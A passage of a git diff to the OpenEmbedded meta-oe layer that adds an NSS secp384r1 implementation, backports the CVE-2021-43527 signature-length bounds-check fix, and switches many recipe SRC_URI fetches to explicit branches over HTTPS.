++ ++ ARGCHK(in_x != NULL && in_y != NULL && out_x != NULL && out_y != NULL, ++ MP_BADARG); ++ ++ /* fail on out of range scalars */ ++ if (mpl_significant_bits(n1) > 384 || mp_cmp_z(n1) != 1 || ++ mpl_significant_bits(n2) > 384 || mp_cmp_z(n2) != 1) ++ return MP_RANGE; ++ ++ MP_CHECKOK(mp_to_fixlen_octets(n1, b_n1, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(n2, b_n2, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(in_x, b_x, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(in_y, b_y, 48)); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_BE2LE(b_n1); ++ MP_BE2LE(b_n2); ++ point_mul_two(b_x, b_y, b_n1, b_n2, b_x, b_y); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_CHECKOK(mp_read_unsigned_octets(out_x, b_x, 48)); ++ MP_CHECKOK(mp_read_unsigned_octets(out_y, b_y, 48)); ++ ++CLEANUP: ++ return res; ++} ++ ++mp_err ++ec_group_set_secp384r1(ECGroup *group, ECCurveName name) ++{ ++ if (name == ECCurve_NIST_P384) { ++ group->base_point_mul = &point_mul_g_secp384r1; ++ group->point_mul = &point_mul_secp384r1; ++ group->points_mul = &point_mul_two_secp384r1; ++ } ++ return MP_OKAY; ++} ++ ++#endif /* __SIZEOF_INT128__ */ +diff --git a/lib/freebl/freebl_base.gypi b/lib/freebl/freebl_base.gypi +--- a/nss/lib/freebl/freebl_base.gypi ++++ b/nss/lib/freebl/freebl_base.gypi +@@ -30,16 +30,17 @@ + 'ecl/ecp_256.c', + 'ecl/ecp_256_32.c', + 'ecl/ecp_384.c', + 'ecl/ecp_521.c', + 'ecl/ecp_aff.c', + 'ecl/ecp_jac.c', + 'ecl/ecp_jm.c', + 'ecl/ecp_mont.c', ++ 'ecl/ecp_secp384r1.c', + 'fipsfreebl.c', + 'blinit.c', + 'freeblver.c', + 'gcm.c', + 'hmacct.c', + 'jpake.c', + 'ldvector.c', + 'md2.c', +diff --git a/lib/freebl/manifest.mn b/lib/freebl/manifest.mn +--- a/nss/lib/freebl/manifest.mn ++++ b/nss/lib/freebl/manifest.mn +@@ -102,17 +102,17 @@ PRIVATE_EXPORTS = \ + MPI_HDRS = mpi-config.h mpi.h mpi-priv.h mplogic.h mpprime.h logtab.h mp_gf2m.h + MPI_SRCS = mpprime.c mpmontg.c mplogic.c mpi.c mp_gf2m.c + + + ECL_HDRS = ecl-exp.h ecl.h ecp.h ecl-priv.h + ECL_SRCS = ecl.c ecl_mult.c ecl_gf.c \ + ecp_aff.c ecp_jac.c ecp_mont.c \ + ec_naf.c ecp_jm.c ecp_256.c ecp_384.c ecp_521.c \ +- ecp_256_32.c ecp_25519.c ++ ecp_256_32.c ecp_25519.c ecp_secp384r1.c + SHA_SRCS = sha_fast.c + MPCPU_SRCS = mpcpucache.c + VERIFIED_SRCS = $(NULL) + + CSRCS = \ + freeblver.c \ + ldvector.c \ + sysrand.c \ +diff --git a/nss/tests/ec/ectest.sh b/tests/ec/ectest.sh +old mode 100644 +new mode 100755 + diff --git a/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2021-43527.patch b/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2021-43527.patch new file mode 100644 index 0000000000..cf3ea63cac --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2021-43527.patch @@ -0,0 +1,283 @@ +Description: fix heap overflow when verifying DSA/RSA-PSS DER-encoded signatures +Origin: Provided by Mozilla + +CVE: CVE-2021-43527 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.35-2ubuntu2.13.debian.tar.xz] +Comment: Refreshed hunk 1 and 6 due to fuzz +Signed-off-by: Sana Kazi + +--- a/nss/lib/cryptohi/secvfy.c ++++ b/nss/lib/cryptohi/secvfy.c +@@ -164,6 +164,37 @@ + PR_FALSE /*XXX: unsafeAllowMissingParameters*/); + } + ++static unsigned int ++checkedSignatureLen(const SECKEYPublicKey *pubk) ++{ ++ unsigned int sigLen = SECKEY_SignatureLen(pubk); ++ if (sigLen == 0) { ++ /* Error set by SECKEY_SignatureLen */ ++ return sigLen; ++ } ++ unsigned int maxSigLen; ++ switch (pubk->keyType) { ++ case rsaKey: ++ case rsaPssKey: ++ maxSigLen = (RSA_MAX_MODULUS_BITS + 7) / 8; ++ break; ++ case dsaKey: ++ maxSigLen = DSA_MAX_SIGNATURE_LEN; ++ break; ++ case ecKey: ++ maxSigLen = 2 * MAX_ECKEY_LEN; ++ break; ++ default: ++ PORT_SetError(SEC_ERROR_UNSUPPORTED_KEYALG); ++ return 0; ++ } ++ if (sigLen > maxSigLen) { ++ PORT_SetError(SEC_ERROR_INVALID_KEY); ++ return 0; ++ } ++ return sigLen; ++} ++ + /* + * decode the ECDSA or DSA signature from it's DER wrapping. + * The unwrapped/raw signature is placed in the buffer pointed +@@ -174,38 +205,38 @@ decodeECorDSASignature(SECOidTag algid, + unsigned int len) + { + SECItem *dsasig = NULL; /* also used for ECDSA */ +- SECStatus rv = SECSuccess; + +- if ((algid != SEC_OID_ANSIX9_DSA_SIGNATURE) && +- (algid != SEC_OID_ANSIX962_EC_PUBLIC_KEY)) { +- if (sig->len != len) { +- PORT_SetError(SEC_ERROR_BAD_DER); +- return SECFailure; ++ /* Safety: Ensure algId is as expected and that signature size is within maxmimums */ ++ if (algid == SEC_OID_ANSIX9_DSA_SIGNATURE) { ++ if (len > DSA_MAX_SIGNATURE_LEN) { ++ goto loser; + } +- +- PORT_Memcpy(dsig, sig->data, sig->len); +- return SECSuccess; +- } +- +- if (algid == SEC_OID_ANSIX962_EC_PUBLIC_KEY) { ++ } else if (algid == SEC_OID_ANSIX962_EC_PUBLIC_KEY) { + if (len > MAX_ECKEY_LEN * 2) { +- PORT_SetError(SEC_ERROR_BAD_DER); +- return SECFailure; ++ goto loser; + } +- } +- dsasig = DSAU_DecodeDerSigToLen((SECItem *)sig, len); +- +- if ((dsasig == NULL) || (dsasig->len != len)) { +- rv = SECFailure; + } else { +- PORT_Memcpy(dsig, dsasig->data, dsasig->len); ++ goto loser; + } + +- if (dsasig != NULL) ++ /* Decode and pad to length */ ++ dsasig = DSAU_DecodeDerSigToLen((SECItem *)sig, len); ++ if (dsasig == NULL) { ++ goto loser; ++ } ++ if (dsasig->len != len) { + SECITEM_FreeItem(dsasig, PR_TRUE); +- if (rv == SECFailure) +- PORT_SetError(SEC_ERROR_BAD_DER); +- return rv; ++ goto loser; ++ } ++ ++ PORT_Memcpy(dsig, dsasig->data, len); ++ SECITEM_FreeItem(dsasig, PR_TRUE); ++ ++ return SECSuccess; ++ ++loser: ++ PORT_SetError(SEC_ERROR_BAD_DER); ++ return SECFailure; + } + + const SEC_ASN1Template hashParameterTemplate[] = +@@ -231,7 +262,7 @@ SECStatus + sec_DecodeSigAlg(const SECKEYPublicKey *key, SECOidTag sigAlg, + const SECItem *param, SECOidTag *encalg, SECOidTag *hashalg) + { +- int len; ++ unsigned int len; + PLArenaPool *arena; + SECStatus rv; + SECItem oid; +@@ -458,48 +489,52 @@ vfy_CreateContext(const SECKEYPublicKey + cx->pkcs1RSADigestInfo = NULL; + rv = SECSuccess; + if (sig) { +- switch (type) { +- case rsaKey: +- rv = recoverPKCS1DigestInfo(hashAlg, &cx->hashAlg, +- &cx->pkcs1RSADigestInfo, +- &cx->pkcs1RSADigestInfoLen, +- cx->key, +- sig, wincx); +- break; +- case rsaPssKey: +- sigLen = SECKEY_SignatureLen(key); +- if (sigLen == 0) { +- /* error set by SECKEY_SignatureLen */ +- rv = SECFailure; ++ rv = SECFailure; ++ if (type == rsaKey) { ++ rv = recoverPKCS1DigestInfo(hashAlg, &cx->hashAlg, ++ &cx->pkcs1RSADigestInfo, ++ &cx->pkcs1RSADigestInfoLen, ++ cx->key, ++ sig, wincx); ++ } else { ++ sigLen = checkedSignatureLen(key); ++ /* Check signature length is within limits */ ++ if (sigLen == 0) { ++ /* error set by checkedSignatureLen */ ++ rv = SECFailure; ++ goto loser; ++ } ++ if (sigLen > sizeof(cx->u)) { ++ PORT_SetError(SEC_ERROR_BAD_SIGNATURE); ++ rv = SECFailure; ++ goto loser; ++ } ++ switch (type) { ++ case rsaPssKey: ++ if (sig->len != sigLen) { ++ PORT_SetError(SEC_ERROR_BAD_SIGNATURE); ++ rv = SECFailure; ++ goto loser; ++ } ++ PORT_Memcpy(cx->u.buffer, sig->data, sigLen); ++ rv = SECSuccess; + break; +- } +- if (sig->len != sigLen) { +- PORT_SetError(SEC_ERROR_BAD_SIGNATURE); +- rv = SECFailure; ++ case ecKey: ++ case dsaKey: ++ /* decodeECorDSASignature will check sigLen == sig->len after padding */ ++ rv = decodeECorDSASignature(encAlg, sig, cx->u.buffer, sigLen); + break; +- } +- PORT_Memcpy(cx->u.buffer, sig->data, sigLen); +- break; +- case dsaKey: +- case ecKey: +- sigLen = SECKEY_SignatureLen(key); +- if (sigLen == 0) { +- /* error set by SECKEY_SignatureLen */ ++ default: ++ /* Unreachable */ + rv = SECFailure; +- break; +- } +- rv = decodeECorDSASignature(encAlg, sig, cx->u.buffer, sigLen); +- break; +- default: +- rv = SECFailure; +- PORT_SetError(SEC_ERROR_UNSUPPORTED_KEYALG); +- break; ++ goto loser; ++ } ++ } ++ if (rv != SECSuccess) { ++ goto loser; + } + } + +- if (rv) +- goto loser; +- + /* check hash alg again, RSA may have changed it.*/ + if (HASH_GetHashTypeByOidTag(cx->hashAlg) == HASH_AlgNULL) { + /* error set by HASH_GetHashTypeByOidTag */ +@@ -634,11 +669,16 @@ VFY_EndWithSignature(VFYContext *cx, SEC + switch (cx->key->keyType) { + case ecKey: + case dsaKey: +- dsasig.data = cx->u.buffer; +- dsasig.len = SECKEY_SignatureLen(cx->key); ++ dsasig.len = checkedSignatureLen(cx->key); + if (dsasig.len == 0) { + return SECFailure; + } ++ if (dsasig.len > sizeof(cx->u)) { ++ PORT_SetError(SEC_ERROR_BAD_SIGNATURE); ++ return SECFailure; ++ } ++ dsasig.data = cx->u.buffer; ++ + if (sig) { + rv = decodeECorDSASignature(cx->encAlg, sig, dsasig.data, + dsasig.len); +@@ -667,8 +698,13 @@ + } + + rsasig.data = cx->u.buffer; +- rsasig.len = SECKEY_SignatureLen(cx->key); ++ rsasig.len = checkedSignatureLen(cx->key); + if (rsasig.len == 0) { ++ /* Error set by checkedSignatureLen */ ++ return SECFailure; ++ } ++ if (rsasig.len > sizeof(cx->u)) { ++ PORT_SetError(SEC_ERROR_BAD_SIGNATURE); + return SECFailure; + } + if (sig) { +@@ -743,7 +788,6 @@ vfy_VerifyDigest(const SECItem *digest, + SECStatus rv; + VFYContext *cx; + SECItem dsasig; /* also used for ECDSA */ +- + rv = SECFailure; + + cx = vfy_CreateContext(key, sig, encAlg, hashAlg, NULL, wincx); +@@ -751,19 +795,25 @@ vfy_VerifyDigest(const SECItem *digest, + switch (key->keyType) { + case rsaKey: + rv = verifyPKCS1DigestInfo(cx, digest); ++ /* Error (if any) set by verifyPKCS1DigestInfo */ + break; +- case dsaKey: + case ecKey: ++ case dsaKey: + dsasig.data = cx->u.buffer; +- dsasig.len = SECKEY_SignatureLen(cx->key); ++ dsasig.len = checkedSignatureLen(cx->key); + if (dsasig.len == 0) { ++ /* Error set by checkedSignatureLen */ ++ rv = SECFailure; + break; + } +- if (PK11_Verify(cx->key, &dsasig, (SECItem *)digest, cx->wincx) != +- SECSuccess) { ++ if (dsasig.len > sizeof(cx->u)) { ++ PORT_SetError(SEC_ERROR_BAD_SIGNATURE); ++ rv = SECFailure; ++ break; ++ } ++ rv = PK11_Verify(cx->key, &dsasig, (SECItem *)digest, cx->wincx); ++ if (rv != SECSuccess) { + PORT_SetError(SEC_ERROR_BAD_SIGNATURE); +- } else { +- rv = SECSuccess; + } + break; + default: diff --git a/meta-openembedded/meta-oe/recipes-support/nss/nss_3.51.1.bb b/meta-openembedded/meta-oe/recipes-support/nss/nss_3.51.1.bb index 13661cc967..f03473b1a0 100644 --- a/meta-openembedded/meta-oe/recipes-support/nss/nss_3.51.1.bb +++ b/meta-openembedded/meta-oe/recipes-support/nss/nss_3.51.1.bb @@ -36,6 +36,10 @@ SRC_URI = "http://ftp.mozilla.org/pub/mozilla.org/security/nss/releases/${VERSIO file://0001-Enable-uint128-on-mips64.patch \ file://0001-Bug-1631576-Force-a-fixed-length-for-DSA-exponentiat.patch \ file://CVE-2020-12401.patch \ + file://CVE-2020-6829_12400.patch \ + file://CVE-2020-12403_1.patch \ + file://CVE-2020-12403_2.patch \ + file://CVE-2021-43527.patch \ " SRC_URI[md5sum] = "6acaf1ddff69306ae30a908881c6f233" diff --git a/meta-openembedded/meta-oe/recipes-support/numactl/numactl_git.bb b/meta-openembedded/meta-oe/recipes-support/numactl/numactl_git.bb index 20b7fed862..af082237c3 100644 --- a/meta-openembedded/meta-oe/recipes-support/numactl/numactl_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/numactl/numactl_git.bb @@ -13,7 +13,7 @@ LIC_FILES_CHKSUM = "file://README.md;beginline=19;endline=32;md5=f8ff2391624f28e SRCREV = "5d9f16722e3df49dc618a9f361bd482559695db7" PV = "2.0.13+git${SRCPV}" -SRC_URI = "git://github.com/numactl/numactl \ +SRC_URI = "git://github.com/numactl/numactl;branch=master;protocol=https \ file://Fix-the-test-output-format.patch \ file://Makefile \ file://run-ptest \ diff --git a/meta-openembedded/meta-oe/recipes-support/open-vm-tools/open-vm-tools_11.0.1.bb b/meta-openembedded/meta-oe/recipes-support/open-vm-tools/open-vm-tools_11.0.1.bb index 34a81d21f0..3cf0aa8292 100644 --- a/meta-openembedded/meta-oe/recipes-support/open-vm-tools/open-vm-tools_11.0.1.bb +++ b/meta-openembedded/meta-oe/recipes-support/open-vm-tools/open-vm-tools_11.0.1.bb @@ -21,7 +21,7 @@ LICENSE_modules/freebsd/vmxnet = "GPL-2.0" LICENSE_modules/linux = "GPL-2.0" LICENSE_modules/solaris = "CDDL-1.0" -SRC_URI = "git://github.com/vmware/open-vm-tools.git;protocol=https \ +SRC_URI = "git://github.com/vmware/open-vm-tools.git;protocol=https;branch=master \ file://tools.conf \ file://vmtoolsd.service \ file://vmtoolsd.init \ diff --git a/meta-openembedded/meta-oe/recipes-support/opencl/clinfo_2.2.18.04.06.bb b/meta-openembedded/meta-oe/recipes-support/opencl/clinfo_2.2.18.04.06.bb index 9fd88ced95..831b15a455 100644 --- a/meta-openembedded/meta-oe/recipes-support/opencl/clinfo_2.2.18.04.06.bb +++ b/meta-openembedded/meta-oe/recipes-support/opencl/clinfo_2.2.18.04.06.bb @@ -7,7 +7,7 @@ HOMEPAGE = "https://github.com/Oblomov/clinfo" LICENSE = "CC0-1.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=fd8857f774dfb0eefe1e80c8f9240a7e" -SRC_URI = "git://github.com/Oblomov/clinfo.git;protocol=https" +SRC_URI = "git://github.com/Oblomov/clinfo.git;protocol=https;branch=master" SRCREV = "59d0daf898e48d76ccbb788acbba258fa0a8ba7c" diff --git a/meta-openembedded/meta-oe/recipes-support/opencv/ade_0.1.1f.bb b/meta-openembedded/meta-oe/recipes-support/opencv/ade_0.1.1f.bb index 3861802158..7e9bbc31c9 100644 --- a/meta-openembedded/meta-oe/recipes-support/opencv/ade_0.1.1f.bb +++ b/meta-openembedded/meta-oe/recipes-support/opencv/ade_0.1.1f.bb @@ -4,7 +4,7 @@ and processing framework. ADE Framework is suitable for \ organizing data flow processing and execution." HOMEPAGE = "https://github.com/opencv/ade" -SRC_URI = "git://github.com/opencv/ade.git \ +SRC_URI = "git://github.com/opencv/ade.git;branch=master;protocol=https \ file://0001-use-GNUInstallDirs-for-detecting-install-paths.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/opencv/opencv_4.1.0.bb b/meta-openembedded/meta-oe/recipes-support/opencv/opencv_4.1.0.bb index 19d5d0c891..d7a0158749 100644 --- a/meta-openembedded/meta-oe/recipes-support/opencv/opencv_4.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/opencv/opencv_4.1.0.bb @@ -37,12 +37,12 @@ IPP_FILENAME = "${@ipp_filename(d)}" IPP_MD5 = "${@ipp_md5sum(d)}" SRCREV_FORMAT = "opencv_contrib_ipp_boostdesc_vgg" -SRC_URI = "git://github.com/opencv/opencv.git;name=opencv \ - git://github.com/opencv/opencv_contrib.git;destsuffix=contrib;name=contrib \ - git://github.com/opencv/opencv_3rdparty.git;branch=ippicv/master_20180723;destsuffix=ipp;name=ipp \ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_boostdesc_20161012;destsuffix=boostdesc;name=boostdesc \ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_vgg_20160317;destsuffix=vgg;name=vgg \ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_face_alignment_20170818;destsuffix=face;name=face \ +SRC_URI = "git://github.com/opencv/opencv.git;name=opencv;branch=master;protocol=https \ + git://github.com/opencv/opencv_contrib.git;destsuffix=contrib;name=contrib;branch=master;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=ippicv/master_20180723;destsuffix=ipp;name=ipp;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_boostdesc_20161012;destsuffix=boostdesc;name=boostdesc;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_vgg_20160317;destsuffix=vgg;name=vgg;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_face_alignment_20170818;destsuffix=face;name=face;protocol=https \ file://0001-3rdparty-ippicv-Use-pre-downloaded-ipp.patch \ file://0002-Make-opencv-ts-create-share-library-intead-of-static.patch \ file://0003-To-fix-errors-as-following.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/opensc/opensc_0.20.0.bb b/meta-openembedded/meta-oe/recipes-support/opensc/opensc_0.20.0.bb index a815980c4f..b8cf203b7f 100644 --- a/meta-openembedded/meta-oe/recipes-support/opensc/opensc_0.20.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/opensc/opensc_0.20.0.bb @@ -13,7 +13,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34" #v0.19.0 SRCREV = "45e29056ccde422e70ed3585084a7f150c632515" -SRC_URI = "git://github.com/OpenSC/OpenSC \ +SRC_URI = "git://github.com/OpenSC/OpenSC;branch=master;protocol=https \ " DEPENDS = "virtual/libiconv openssl" diff --git a/meta-openembedded/meta-oe/recipes-support/picocom/picocom_git.bb b/meta-openembedded/meta-oe/recipes-support/picocom/picocom_git.bb index 3d26b9364b..801300e707 100644 --- a/meta-openembedded/meta-oe/recipes-support/picocom/picocom_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/picocom/picocom_git.bb @@ -9,7 +9,7 @@ PV = "${BASEPV}+git${SRCPV}" SRCREV = "90385aabe2b51f39fa130627d46b377569f82d4a" -SRC_URI = "git://github.com/npat-efault/picocom \ +SRC_URI = "git://github.com/npat-efault/picocom;branch=master;protocol=https \ file://0001-Fix-building-with-musl.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/pidgin/funyahoo-plusplus_git.bb b/meta-openembedded/meta-oe/recipes-support/pidgin/funyahoo-plusplus_git.bb index 3a437659e7..0e3e5ff733 100644 --- a/meta-openembedded/meta-oe/recipes-support/pidgin/funyahoo-plusplus_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/pidgin/funyahoo-plusplus_git.bb @@ -7,7 +7,7 @@ DEPENDS = "pidgin json-glib glib-2.0" inherit pkgconfig -SRC_URI = "git://github.com/EionRobb/funyahoo-plusplus;branch=master;protocol=git" +SRC_URI = "git://github.com/EionRobb/funyahoo-plusplus;branch=master;protocol=https" SRCREV = "fbbd9c591100aa00a0487738ec7b6acd3d924b3f" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/pidgin/icyque_git.bb b/meta-openembedded/meta-oe/recipes-support/pidgin/icyque_git.bb index 0f32dc3a39..2905e16fcc 100644 --- a/meta-openembedded/meta-oe/recipes-support/pidgin/icyque_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/pidgin/icyque_git.bb @@ -9,7 +9,7 @@ PV = "0.1+gitr${SRCPV}" inherit pkgconfig -SRC_URI = "git://github.com/EionRobb/icyque" +SRC_URI = "git://github.com/EionRobb/icyque;branch=master;protocol=https" SRCREV = "513fc162d5d1a201c2b044e2b42941436d1069d5" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/pidgin/purple-skypeweb_git.bb b/meta-openembedded/meta-oe/recipes-support/pidgin/purple-skypeweb_git.bb index 092e6059b8..854920d2ee 100644 --- a/meta-openembedded/meta-oe/recipes-support/pidgin/purple-skypeweb_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/pidgin/purple-skypeweb_git.bb @@ -7,7 +7,7 @@ DEPENDS = "pidgin json-glib glib-2.0 zlib" inherit pkgconfig -SRC_URI = "git://github.com/EionRobb/skype4pidgin;branch=master;protocol=git" +SRC_URI = "git://github.com/EionRobb/skype4pidgin;branch=master;protocol=https" SRCREV = "14f1b69b6292bbdc98cca484b050ec8359394c4e" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/poco/poco_1.9.4.bb b/meta-openembedded/meta-oe/recipes-support/poco/poco_1.9.4.bb index fcd5219759..1c3a4ebb03 100644 --- a/meta-openembedded/meta-oe/recipes-support/poco/poco_1.9.4.bb +++ b/meta-openembedded/meta-oe/recipes-support/poco/poco_1.9.4.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=4267f48fc738f50380cbeeb76f95cebc" DEPENDS = "libpcre zlib" SRC_URI = " \ - git://github.com/pocoproject/poco.git;branch=poco-${PV} \ + git://github.com/pocoproject/poco.git;branch=poco-${PV};protocol=https \ file://0001-Don-t-try-to-install-non-existing-Encodings-testsuit.patch \ file://0001-riscv-Enable-double-operations-when-using-double-flo.patch \ file://run-ptest \ diff --git a/meta-openembedded/meta-oe/recipes-support/pps-tools/pps-tools_1.0.2.bb b/meta-openembedded/meta-oe/recipes-support/pps-tools/pps-tools_1.0.2.bb index c8baa5d9ca..5b53587745 100644 --- a/meta-openembedded/meta-oe/recipes-support/pps-tools/pps-tools_1.0.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/pps-tools/pps-tools_1.0.2.bb @@ -5,7 +5,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" SRCREV = "cb48b7ecf7079ceba7081c78d4e61e507b0e8d2d" -SRC_URI = "git://github.com/ago/pps-tools.git" +SRC_URI = "git://github.com/ago/pps-tools.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/remmina/remmina_1.3.6.bb b/meta-openembedded/meta-oe/recipes-support/remmina/remmina_1.3.6.bb index 1c2f270e32..3b1e8706ce 100644 --- a/meta-openembedded/meta-oe/recipes-support/remmina/remmina_1.3.6.bb +++ b/meta-openembedded/meta-oe/recipes-support/remmina/remmina_1.3.6.bb @@ -10,7 +10,7 @@ DEPENDS_append_libc-musl = " libexecinfo" LDFLAGS_append_libc-musl = " -lexecinfo" SRCREV = "cc391370d8b4c07597617e0a771a9732f0802411" -SRC_URI = "git://gitlab.com/Remmina/Remmina;protocol=https \ +SRC_URI = "git://gitlab.com/Remmina/Remmina;protocol=https;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/rsnapshot/rsnapshot_git.bb b/meta-openembedded/meta-oe/recipes-support/rsnapshot/rsnapshot_git.bb index 33f5dccca2..6fe8aa76f2 100644 --- a/meta-openembedded/meta-oe/recipes-support/rsnapshot/rsnapshot_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/rsnapshot/rsnapshot_git.bb @@ -25,7 +25,7 @@ RDEPENDS_${PN} = "rsync \ SRCREV = "a9e29850fc33c503c289e245c7bad350eed746d9" PV = "1.4.3+git${SRCPV}" -SRC_URI = "git://github.com/DrHyde/${BPN};branch=master;protocol=git \ +SRC_URI = "git://github.com/DrHyde/${BPN};branch=master;protocol=https \ file://configure-fix-cmd_rsync.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/sass/libsass_3.6.3.bb b/meta-openembedded/meta-oe/recipes-support/sass/libsass_3.6.3.bb index d893be2231..4b4fe55669 100644 --- a/meta-openembedded/meta-oe/recipes-support/sass/libsass_3.6.3.bb +++ b/meta-openembedded/meta-oe/recipes-support/sass/libsass_3.6.3.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=8f34396ca205f5e119ee77aae91fa27d" inherit autotools -SRC_URI = "git://github.com/sass/libsass.git;branch=master" +SRC_URI = "git://github.com/sass/libsass.git;branch=master;protocol=https" SRCREV = "e1c16e09b4a953757a15149deaaf28a3fd81dc97" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/sass/sassc_git.bb b/meta-openembedded/meta-oe/recipes-support/sass/sassc_git.bb index 3c7a55cc3d..985d519f93 100644 --- a/meta-openembedded/meta-oe/recipes-support/sass/sassc_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/sass/sassc_git.bb @@ -6,7 +6,7 @@ DEPENDS = "libsass" inherit autotools pkgconfig -SRC_URI = "git://github.com/sass/sassc.git" +SRC_URI = "git://github.com/sass/sassc.git;branch=master;protocol=https" SRCREV = "46748216ba0b60545e814c07846ca10c9fefc5b6" S = "${WORKDIR}/git" PV = "3.6.1" diff --git a/meta-openembedded/meta-oe/recipes-support/satyr/satyr_0.28.bb b/meta-openembedded/meta-oe/recipes-support/satyr/satyr_0.28.bb index fbf018d7f5..a928681ae8 100644 --- a/meta-openembedded/meta-oe/recipes-support/satyr/satyr_0.28.bb +++ b/meta-openembedded/meta-oe/recipes-support/satyr/satyr_0.28.bb @@ -7,7 +7,7 @@ LICENSE = "GPLv2" inherit autotools-brokensep python3native pkgconfig -SRC_URI = "git://github.com/abrt/satyr.git \ +SRC_URI = "git://github.com/abrt/satyr.git;branch=master;protocol=https \ file://0002-fix-compile-failure-against-musl-C-library.patch \ " SRCREV = "8b5547b89b712b39a59f1d8b366e7de0f5f46108" diff --git a/meta-openembedded/meta-oe/recipes-support/serial-utils/pty-forward-native.bb b/meta-openembedded/meta-oe/recipes-support/serial-utils/pty-forward-native.bb index 7f59b3ecad..87d9c52903 100644 --- a/meta-openembedded/meta-oe/recipes-support/serial-utils/pty-forward-native.bb +++ b/meta-openembedded/meta-oe/recipes-support/serial-utils/pty-forward-native.bb @@ -6,7 +6,7 @@ SECTION = "console/network" SRCREV = "00dbec2636ae0385ad028587e20e446272ff97ec" PV = "1.1+gitr${SRCPV}" -SRC_URI = "git://github.com/freesmartphone/cornucopia.git;protocol=https" +SRC_URI = "git://github.com/freesmartphone/cornucopia.git;protocol=https;branch=master" S = "${WORKDIR}/git/tools/serial_forward" inherit autotools native diff --git a/meta-openembedded/meta-oe/recipes-support/serial-utils/serial-forward_git.bb b/meta-openembedded/meta-oe/recipes-support/serial-utils/serial-forward_git.bb index 0ef829856c..dcad8f7104 100644 --- a/meta-openembedded/meta-oe/recipes-support/serial-utils/serial-forward_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/serial-utils/serial-forward_git.bb @@ -6,7 +6,7 @@ SECTION = "console/devel" SRCREV = "07c6fdede0870edc37a8d51d033b6e7e29aa7c91" PV = "1.1+gitr${SRCPV}" -SRC_URI = "git://github.com/freesmartphone/cornucopia.git \ +SRC_URI = "git://github.com/freesmartphone/cornucopia.git;branch=master;protocol=https \ file://0001-serial_forward-Disable-default-static-linking.patch;striplevel=3 \ " S = "${WORKDIR}/git/tools/serial_forward" diff --git a/meta-openembedded/meta-oe/recipes-support/span-lite/span-lite_git.bb b/meta-openembedded/meta-oe/recipes-support/span-lite/span-lite_git.bb index 96ec829b74..abb3ec2f36 100644 --- a/meta-openembedded/meta-oe/recipes-support/span-lite/span-lite_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/span-lite/span-lite_git.bb @@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/martinmoene/span-lite" LICENSE = "BSL-1.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=e4224ccaecb14d942c71d31bef20d78c" -SRC_URI += "git://github.com/martinmoene/span-lite" +SRC_URI += "git://github.com/martinmoene/span-lite;branch=master;protocol=https" SRCREV = "e03d1166ccc8481d993dc02aae703966301a5e6e" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/spdlog/spdlog_1.5.0.bb b/meta-openembedded/meta-oe/recipes-support/spdlog/spdlog_1.5.0.bb index 39629cce0d..9294d1a70e 100644 --- a/meta-openembedded/meta-oe/recipes-support/spdlog/spdlog_1.5.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/spdlog/spdlog_1.5.0.bb @@ -4,7 +4,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" SRCREV = "cf6f1dd01e660d5865d68bf5fa78f6376b89470a" -SRC_URI = "git://github.com/gabime/spdlog.git;protocol=git;branch=v1.x;" +SRC_URI = "git://github.com/gabime/spdlog.git;protocol=https;branch=v1.x;" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/spitools/spitools_git.bb b/meta-openembedded/meta-oe/recipes-support/spitools/spitools_git.bb index 